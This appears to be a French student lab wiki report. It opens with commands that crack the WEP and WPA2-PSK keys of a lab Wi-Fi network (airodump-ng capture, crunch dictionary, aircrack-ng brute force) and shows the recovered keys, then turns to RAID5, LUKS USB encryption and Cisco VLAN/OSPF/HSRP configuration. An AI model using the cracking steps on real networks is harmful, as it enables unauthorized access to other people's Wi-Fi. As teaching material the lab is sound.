   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef =====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
